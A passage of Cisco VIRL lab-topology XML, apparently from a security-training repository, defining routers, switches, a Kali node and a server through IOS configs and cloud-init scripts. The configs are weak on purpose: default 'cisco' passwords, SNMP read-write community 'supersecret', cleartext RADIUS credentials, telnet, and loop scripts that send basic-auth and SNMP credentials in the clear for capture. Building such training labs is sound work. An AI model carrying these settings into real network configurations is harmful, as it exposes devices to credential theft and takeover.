exit-address-family ! address-family ipv6 exit-address-family ! enable password 7 060506324F41 ! aaa new-model ! ! aaa authentication login default group radius local line aaa authorization exec default group radius if-authenticated ! ! ! ! ! aaa session-id common ethernet lmi ce ! ! ! mmi polling-interval 60 no mmi auto-configure no mmi pvc mmi snmp-timeout 180 ! ! ! ! ! ! ! ! ! ! ! no ip domain lookup ip domain name virl.info ip cef ipv6 unicast-routing ipv6 cef ! multilink bundle-name authenticated ! ! ! ! username cisco privilege 15 secret 5 $1$WaUX$blEhl/Fee6CSV8WMIvhv4. ! redundancy ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ip address 172.16.1.191 255.255.255.0 duplex full speed auto media-type rj45 ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto media-type rj45 ! router ospf 1 passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 192.168.0.4 0.0.0.0 area 0 ! router bgp 1 bgp router-id 192.168.0.4 bgp log-neighbor-changes neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ip forward-protocol nd ! ! no ip http server no ip http secure-server ip ssh server algorithm authentication password ! ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 ! ip radius source-interface Loopback0 ! snmp-server community supersecret RW SNMP-RW snmp-server chassis-id ! ! ! radius server RADIUS address ipv4 10.0.128.2 auth-port 1812 acct-port 1813 key 7 13061E0108030723382727 ! ! control-plane ! banner exec ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner incoming ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner login ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ ! line con 0 password 7 0822455D0A16 line aux 0 line vty 0 4 exec-timeout 720 0 password 7 1511021F0725 transport input telnet ssh ! no scheduler allocate ! end </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.1"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 snmp-server community supersecret rw SNMP-RW line vty 0 4 transport input ssh telnet access-class IN-VTY in vrf-also exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.1 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.2 255.255.128.0 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to admin-1 ip address 10.0.128.5 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.1 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 10.0.128.0 0.0.0.3 area 0 network 10.0.128.4 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.1 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.1 mask 255.255.255.255 neighbor 192.168.0.4 activate exit-address-family ! ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true package_update: true packages: - snmp - freeradius - tshark runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart - cp /tmp/clients.conf.new /etc/freeradius/clients.conf - cp /tmp/users.new /etc/freeradius/users - systemctl enable freeradius - systemctl start freeradius - chown -R cisco:cisco /home/cisco - sudo -u cisco /home/cisco/http-chatter.sh &amp; - sudo -u cisco /home/cisco/snmp-chatter.sh &amp; users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.1 dev eth1 route add -host 192.168.0.4 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 - path: /tmp/clients.conf.new content: | client 192.168.0.0/24 { secret = ciscocisco nastype = cisco shortname = virl } owner: "root:root" permissions: '0640' - path: /tmp/users.new content: | admin Cleartext-Password := "secret123" Service-Type = NAS-Prompt-User, Cisco-AVPair = "shell:priv-lvl=15" owner: "root:root" permissions: '0640' - path: /home/cisco/http-chatter.sh content: | #!/bin/bash while true; do curl -u admin:secret123 http://192.168.0.4 sleep 15 done owner: "root:root" permissions: '0755' - path: /home/cisco/snmp-chatter.sh content: | #!/bin/bash while true; do snmpget -v 2c -c supersecret 192.168.0.4 1.3.6.1.2.1.1.1.0 sleep 15 done owner: "root:root" permissions: '0755' </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="370,291" ipv4="192.168.0.4"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.6 service timestamps debug datetime msec service timestamps log datetime msec service password-encryption ! hostname iosv-2 ! boot-start-marker boot-end-marker ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! enable password 7 060506324F41 ! aaa new-model ! ! aaa authentication login default group radius local line aaa authorization exec default group radius if-authenticated ! ! ! ! ! aaa session-id common ethernet lmi ce ! ! ! mmi polling-interval 60 no mmi auto-configure no mmi pvc mmi snmp-timeout 180 ! ! ! ! ! ! ! ! ! ! ! no ip domain lookup ip domain name virl.info ip cef ipv6 unicast-routing ipv6 cef ! multilink bundle-name authenticated ! ! ! ! username cisco privilege 15 secret 5 $1$WaUX$blEhl/Fee6CSV8WMIvhv4. ! redundancy ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ip address 172.16.1.182 255.255.255.0 duplex full speed auto media-type rj45 ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto media-type rj45 ! router ospf 1 passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 192.168.0.4 0.0.0.0 area 0 ! router bgp 1 bgp router-id 192.168.0.4 bgp log-neighbor-changes neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ip forward-protocol nd ! ! ip http server ip http authentication aaa login-authentication default no ip http secure-server ip ssh server algorithm authentication password ! ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 ! ip radius source-interface Loopback0 ! snmp-server community supersecret RW SNMP-RW snmp-server chassis-id ! ! ! radius server RADIUS address ipv4 10.0.128.2 auth-port 1812 acct-port 1813 key 7 13061E0108030723382727 ! ! control-plane ! banner exec ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner incoming ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner login ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ ! line con 0 password 7 0822455D0A16 line aux 0 line vty 0 4 exec-timeout 720 0 password 7 1511021F0725 transport input telnet ssh ! no scheduler allocate ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="admin-1" type="SIMPLE" subtype="lxc" location="605,72"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: admin-1 manage_etc_hosts: true runcmd: - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.128.6 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 route add -net 10.0.0.0/16 gw 10.0.128.5 dev eth1 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[1]" src="/virl:topology/virl:node[4]/virl:interface[3]"/> </topology>
h4cker/virl_topologies/8.4.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="management_network" type="String">exclusive</entry> <entry key="AutoNetkit.enable_cdp" type="Boolean">true</entry> <entry key="AutoNetkit.address_family" type="String">dual_stack</entry> </extensions> <node name="kali-1" type="SIMPLE" subtype="kali" location="34,124"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.6 netmask 255.255.255.252 route add -net 10.0.0.0/8 gw 10.0.0.5 dev eth1 route add -net 192.168.0.0/29 gw 10.0.0.5 dev eth1 ifconfig eth1 add 2001:db8:a:0:1:1:0:7/126 route -A inet6 add 2001:db8:a:0:1::/80 gw 2001:db8:a:0:1:1:0:6 dev eth1 route -A inet6 add 2001:db8:b:0:1::/80 gw 2001:db8:a:0:1:1:0:6 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.6" ipv6="2001:db8:a:0:1:1:0:7" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="522,122"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.10 netmask 255.255.255.252 route add -net 10.0.0.0/8 gw 10.0.0.9 dev eth1 route add -net 192.168.0.0/29 gw 10.0.0.9 dev eth1 ifconfig eth1 add 2001:db8:a:0:1:1:0:a/126 route -A inet6 add 2001:db8:a:0:1::/80 gw 2001:db8:a:0:1:1:0:b dev eth1 route -A inet6 add 2001:db8:b:0:1::/80 gw 2001:db8:a:0:1:1:0:b dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.10" ipv6="2001:db8:a:0:1:1:0:a" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="120,123"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="420,122"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to server-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/2 description to iosv-4 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="188,124" ipv4="192.168.0.3" ipv6="2001:db8:b:0:1::2"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.3 255.255.255.255 ipv6 address 2001:db8:b:0:1::2/128 ipv6 ospf cost 1 ipv6 ospf 1 area 0 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.5 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:6/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-2 ip address 10.0.0.13 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:e/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to iosv-3 ip address 10.0.0.17 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:12/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.3 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.4 0.0.0.3 area 0 network 10.0.0.12 0.0.0.3 area 0 network 10.0.0.16 0.0.0.3 area 0 router ospfv3 1 router-id 192.168.0.3 ! address-family ipv6 unicast exit-address-family ! ! router bgp 1 bgp router-id 192.168.0.3 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.5 remote-as 1 neighbor 192.168.0.5 description iBGP peer iosv-3 neighbor 192.168.0.5 update-source Loopback0 ! neighbor 192.168.0.6 remote-as 1 neighbor 192.168.0.6 description iBGP peer iosv-4 neighbor 192.168.0.6 update-source Loopback0 ! neighbor 2001:db8:b:0:1::3 remote-as 1 neighbor 2001:db8:b:0:1::3 description iBGP peer iosv-2 neighbor 2001:db8:b:0:1::3 update-source Loopback0 ! neighbor 2001:db8:b:0:1::4 remote-as 1 neighbor 2001:db8:b:0:1::4 description iBGP peer iosv-3 neighbor 2001:db8:b:0:1::4 update-source Loopback0 ! neighbor 2001:db8:b:0:1::5 remote-as 1 neighbor 2001:db8:b:0:1::5 description iBGP peer iosv-4 neighbor 2001:db8:b:0:1::5 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.3 mask 255.255.255.255 neighbor 192.168.0.4 activate neighbor 192.168.0.5 activate neighbor 192.168.0.6 activate exit-address-family ! address-family ipv6 network 2001:db8:b:0:1::2/128 neighbor 2001:db8:b:0:1::3 activate neighbor 2001:db8:b:0:1::4 activate neighbor 2001:db8:b:0:1::5 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.5" ipv6="2001:db8:a:0:1:1:0:6" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.13" ipv6="2001:db8:a:0:1:1:0:e" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="2" name="GigabitEthernet0/3" ipv4="10.0.0.17" ipv6="2001:db8:a:0:1:1:0:12" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="261,24" ipv4="192.168.0.4" ipv6="2001:db8:b:0:1::3"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! hostname iosv-2 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ipv6 address 2001:db8:b:0:1::3/128 ipv6 ospf cost 1 ipv6 ospf 1 area 0 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosv-1 ip address 10.0.0.14 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:f/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-4 ip address 10.0.0.21 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:16/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.4 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.12 0.0.0.3 area 0 network 10.0.0.20 0.0.0.3 area 0 router ospfv3 1 router-id 192.168.0.4 ! address-family ipv6 unicast exit-address-family ! ! router bgp 1 bgp router-id 192.168.0.4 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.5 remote-as 1 neighbor 192.168.0.5 description iBGP peer iosv-3 neighbor 192.168.0.5 update-source Loopback0 ! neighbor 192.168.0.6 remote-as 1 neighbor 192.168.0.6 description iBGP peer iosv-4 neighbor 192.168.0.6 update-source Loopback0 ! neighbor 2001:db8:b:0:1::2 remote-as 1 neighbor 2001:db8:b:0:1::2 description iBGP peer iosv-1 neighbor 2001:db8:b:0:1::2 update-source Loopback0 ! neighbor 2001:db8:b:0:1::4 remote-as 1 neighbor 2001:db8:b:0:1::4 description iBGP peer iosv-3 neighbor 